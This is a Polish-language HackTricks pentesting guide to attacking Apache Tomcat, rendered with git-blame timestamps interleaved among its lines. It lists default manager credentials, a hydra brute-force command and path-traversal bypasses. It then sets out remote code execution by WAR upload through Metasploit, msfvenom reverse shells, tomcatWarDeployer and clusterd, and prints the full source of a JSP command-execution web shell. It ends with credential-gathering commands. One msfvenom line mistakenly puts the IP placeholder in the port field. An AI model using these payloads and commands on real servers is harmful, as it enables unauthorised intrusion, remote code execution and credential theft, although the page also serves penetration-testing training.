2022-07-31 22:37:48 +00:00
# Tomcat
2022-04-28 16:01:33 +00:00
< details >
2024-02-11 01:46:25 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-03-14 23:38:03 +00:00
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa** ? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** ? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF** ? Sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-03-14 23:38:03 +00:00
* **Dołącz do** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks** ](https://github.com/carlospolop/hacktricks ) **i** [**repozytorium hacktricks-cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
2022-10-02 23:29:55 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2024-03-14 23:38:03 +00:00
**Try Hard Security Group**
2024-03-24 12:30:56 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:38:03 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2024-02-11 01:46:25 +00:00
## Odkrywanie
2022-04-28 16:01:33 +00:00
2024-03-09 13:32:33 +00:00
* Zazwyczaj działa na **porcie 8080**
2024-03-09 13:17:44 +00:00
* **Powszechny błąd Tomcat:**
2022-04-28 16:01:33 +00:00
2022-10-05 21:51:12 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (6).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-03-24 12:30:56 +00:00
## Eksploracja
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
### **Identyfikacja wersji**
2024-03-09 13:17:44 +00:00
2024-02-11 01:46:25 +00:00
Aby znaleźć wersję Apache Tomcat, można wykonać prostą komendę:
2022-10-02 23:29:55 +00:00
```bash
2024-02-11 01:46:25 +00:00
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
2022-10-02 23:29:55 +00:00
```
2024-03-09 13:17:44 +00:00
### **Lokalizacja plików menedżera**
2020-07-15 15:43:14 +00:00
2024-03-24 12:30:56 +00:00
Identyfikacja dokładnych lokalizacji katalogów ** `/manager` ** i ** `/host-manager` ** jest kluczowa, ponieważ ich nazwy mogą być zmienione. Zaleca się przeprowadzenie ataku siłowego w celu zlokalizowania tych stron.
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### **Wyliczanie nazw użytkowników**
2024-03-09 13:17:44 +00:00
2024-03-24 12:30:56 +00:00
Dla wersji Tomcat starszych niż 6, istnieje możliwość wyliczenia nazw użytkowników poprzez:
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
2024-02-11 01:46:25 +00:00
### **Domyślne dane uwierzytelniające**
2024-03-09 13:17:44 +00:00
Katalog ** `/manager/html` ** jest szczególnie wrażliwy, ponieważ umożliwia przesyłanie i wdrażanie plików WAR, co może prowadzić do wykonania kodu. Ten katalog jest chroniony przez podstawową autentykację HTTP, a powszechne dane uwierzytelniające to:
* admin:admin
* tomcat:tomcat
* admin:
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Te dane uwierzytelniające można przetestować za pomocą:
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
2024-03-24 12:30:56 +00:00
Kolejnym godnym uwagi katalogiem jest ** `/manager/status` **, który wyświetla wersję Tomcat oraz systemu operacyjnego, ułatwiając identyfikację podatności.
2020-07-15 15:43:14 +00:00
2024-03-09 13:17:44 +00:00
### **Atak siłowy**
2024-03-24 12:30:56 +00:00
Aby przeprowadzić atak siłowy na katalog manager, można użyć:
2020-07-15 15:43:14 +00:00
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
2024-03-09 13:32:33 +00:00
## Powszechne podatności
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:33 +00:00
### **Ujawnienie śladów hasła**
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Dostęp do `/auth.jsp` może ujawnić hasło w śladzie w szczęśliwych okolicznościach.
2022-01-16 17:15:05 +00:00
2024-02-11 01:46:25 +00:00
### **Podwójne kodowanie URL**
2022-01-16 17:15:05 +00:00
2024-03-24 12:30:56 +00:00
Podatność CVE-2007-1860 w `mod_jk` umożliwia podwójne kodowanie URL w przypadku trawersowania ścieżki, umożliwiając nieautoryzowany dostęp do interfejsu zarządzania za pomocą specjalnie spreparowanego adresu URL.
2024-03-09 13:17:44 +00:00
2024-03-24 12:30:56 +00:00
Aby uzyskać dostęp do interfejsu webowego zarządzania Tomcatem, przejdź do: `pathTomcat/%252E%252E/manager/html`
2020-07-15 15:43:14 +00:00
2022-07-31 22:37:48 +00:00
### /examples
2024-03-09 13:17:44 +00:00
2024-03-09 13:32:33 +00:00
Wersje Apache Tomcat od 4.x do 7.x zawierają przykładowe skrypty, które są podatne na ujawnianie informacji oraz ataki typu cross-site scripting (XSS). Te skrypty, wymienione wyczerpująco, powinny być sprawdzone pod kątem nieautoryzowanego dostępu i potencjalnej eksploatacji. Znajdź [więcej informacji tutaj ](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/ )
2021-03-24 12:52:26 +00:00
* /examples/jsp/num/numguess.jsp
* /examples/jsp/dates/date.jsp
* /examples/jsp/snp/snoop.jsp
* /examples/jsp/error/error.html
* /examples/jsp/sessions/carts.html
* /examples/jsp/checkbox/check.html
* /examples/jsp/colors/colors.html
* /examples/jsp/cal/login.html
* /examples/jsp/include/include.jsp
* /examples/jsp/forward/forward.jsp
* /examples/jsp/plugin/plugin.jsp
* /examples/jsp/jsptoserv/jsptoservlet.jsp
* /examples/jsp/simpletag/foo.jsp
* /examples/jsp/mail/sendmail.jsp
* /examples/servlet/HelloWorldExample
* /examples/servlet/RequestInfoExample
* /examples/servlet/RequestHeaderExample
* /examples/servlet/RequestParamExample
* /examples/servlet/CookieExample
* /examples/servlet/JndiServlet
* /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp
2024-03-24 12:30:56 +00:00
### **Eksploatacja trawersowania ścieżki**
2021-12-23 18:13:55 +00:00
2024-03-24 12:30:56 +00:00
W niektórych [**podatnych konfiguracjach Tomcat** ](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/ ) można uzyskać dostęp do chronionych katalogów w Tomcacie, używając ścieżki: `/..;/`
2021-12-23 18:13:55 +00:00
2024-03-24 12:30:56 +00:00
Na przykład, można **uzyskać dostęp do strony zarządzania Tomcatem** poprzez dostęp do: `www.vulnerable.com/lalala/..;/manager/html`
2021-12-23 18:13:55 +00:00
2024-03-09 13:17:44 +00:00
**Innym sposobem** na obejście chronionych ścieżek za pomocą tego triku jest dostęp do `http://www.vulnerable.com/;param=value/manager/html`
2024-02-08 21:36:15 +00:00
2022-07-31 22:37:48 +00:00
## RCE
2020-07-15 15:43:14 +00:00
2024-03-24 12:30:56 +00:00
Wreszcie, jeśli masz dostęp do Menedżera Aplikacji Webowej Tomcata, możesz **przesłać i wdrożyć plik .war (wykonać kod)** .
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### Ograniczenia
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:33 +00:00
Będziesz mógł wdrożyć plik WAR tylko jeśli masz **wystarczające uprawnienia** (role: **admin** , **manager** i **manager-script** ). Szczegóły te można znaleźć w pliku _tomcat-users.xml_ , zazwyczaj zdefiniowanym w `/usr/share/tomcat9/etc/tomcat-users.xml` (różni się w zależności od wersji) (patrz [POST ](tomcat.md#post ) sekcja).
2020-07-15 15:43:14 +00:00
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
2021-08-22 16:26:27 +00:00
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
2020-07-15 15:43:14 +00:00
# undeploy
2021-08-22 01:54:08 +00:00
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
2020-07-15 15:43:14 +00:00
```
2022-07-31 22:37:48 +00:00
### Metasploit
2020-07-15 15:43:14 +00:00
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost < IP >
msf exploit(multi/http/tomcat_mgr_upload) > set rport < port >
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername < username >
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword < password >
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
2024-03-14 23:38:03 +00:00
### Odwrócony shell MSFVenom
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
1. Utwórz plik war do wdrożenia:
2020-07-15 15:43:14 +00:00
```bash
2023-10-20 01:15:50 +00:00
msfvenom -p java/shell_reverse_tcp LHOST=< LHOST_IP > LPORT=< LHOST_IP > -f war -o revshell.war
2020-07-15 15:43:14 +00:00
```
2024-02-11 01:46:25 +00:00
2. Prześlij plik `revshell.war` i uzyskaj do niego dostęp (`/revshell/`):
2020-07-15 15:43:14 +00:00
2024-03-09 13:32:33 +00:00
### Powiąż i odwróć powłokę z [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
2020-07-15 15:43:14 +00:00
2024-03-09 13:17:44 +00:00
W niektórych scenariuszach to nie działa (na przykład w starych wersjach sun)
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
#### Pobierz
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
2024-02-11 01:46:25 +00:00
#### Odwrócony shell
2020-07-15 15:43:14 +00:00
```bash
2021-08-29 13:51:49 +00:00
./tomcatWarDeployer.py -U < username > -P < password > -H < ATTACKER_IP > -p < ATTACKER_PORT > < VICTIM_IP > :< VICTIM_PORT > /manager/html/
2020-07-15 15:43:14 +00:00
```
2024-03-09 13:17:44 +00:00
#### Powłoka wiążąca
2020-07-15 15:43:14 +00:00
```bash
./tomcatWarDeployer.py -U < username > -P < password > -p < bind_port > < victim_IP > :< victim_PORT > /manager/html/
```
2024-03-09 13:17:44 +00:00
### Korzystanie z [Culsterd](https://github.com/hatRiot/clusterd)
2024-02-11 01:46:25 +00:00
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
2024-03-09 13:17:44 +00:00
### Metoda manualna - Powłoka sieciowa
2024-02-11 01:46:25 +00:00
2024-03-09 13:17:44 +00:00
Utwórz plik **index.jsp** z tym [zawartością ](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp ):
2020-07-15 15:43:14 +00:00
```java
< FORM METHOD = GET ACTION = 'index.jsp' >
< INPUT name = 'cmd' type = text >
< INPUT type = submit value = 'Run' >
< / FORM >
< %@ page import="java.io.*" %>
< %
2024-02-11 01:46:25 +00:00
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
2020-07-15 15:43:14 +00:00
InputStreamReader(p.getInputStream()));
2024-02-11 01:46:25 +00:00
while((s = sI.readLine()) != null) { output += s+"< / br > "; }
} catch(IOException e) { e.printStackTrace(); }
}
2020-07-15 15:43:14 +00:00
%>
< pre > < %=output %>< / pre >
```
```bash
2022-10-02 23:29:55 +00:00
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
2020-07-15 15:43:14 +00:00
webshell.war is created
2022-10-02 23:29:55 +00:00
# Upload it
2020-07-15 15:43:14 +00:00
```
2024-02-11 01:46:25 +00:00
### Metoda ręczna 2
2022-10-02 23:29:55 +00:00
2024-03-09 13:17:44 +00:00
Pobierz powłokę sieciową JSP, taką jak [ta ](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp ) i utwórz plik WAR:
2022-10-02 23:29:55 +00:00
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
2024-02-11 01:46:25 +00:00
zip -r backup.war cmd.jsp
2022-10-02 23:29:55 +00:00
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
2022-07-31 22:37:48 +00:00
## POST
2020-07-15 15:43:14 +00:00
2024-03-09 13:17:44 +00:00
Nazwa pliku z danymi uwierzytelniającymi Tomcat to _tomcat-users.xml_
2020-07-15 15:43:14 +00:00
```bash
find / -name tomcat-users.xml 2>/dev/null
```
2024-03-09 13:17:44 +00:00
Inne sposoby pozyskiwania poświadczeń Tomcat:
2020-07-15 15:43:14 +00:00
```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```
2024-03-24 12:30:56 +00:00
## Inne narzędzia do skanowania tomcat
2022-07-31 22:37:48 +00:00
* [https://github.com/p0dalirius/ApacheTomcatScanner ](https://github.com/p0dalirius/ApacheTomcatScanner )
2022-04-28 16:01:33 +00:00
2024-03-24 12:30:56 +00:00
## Odnośniki
2024-03-09 13:17:44 +00:00
2024-02-08 21:36:15 +00:00
* [https://github.com/simran-sankhala/Pentest-Tomcat ](https://github.com/simran-sankhala/Pentest-Tomcat )
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf ](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf )
2024-03-14 23:38:03 +00:00
**Try Hard Security Group**
2024-03-24 12:30:56 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:38:03 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-14 23:38:03 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-09-02 23:48:41 +00:00
2024-03-24 12:30:56 +00:00
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa** ? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks** ? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF** ? Sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-03-14 23:38:03 +00:00
* **Dołącz do** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-03-09 13:32:33 +00:00
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks** ](https://github.com/carlospolop/hacktricks ) **i** [**repozytorium hacktricks-cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >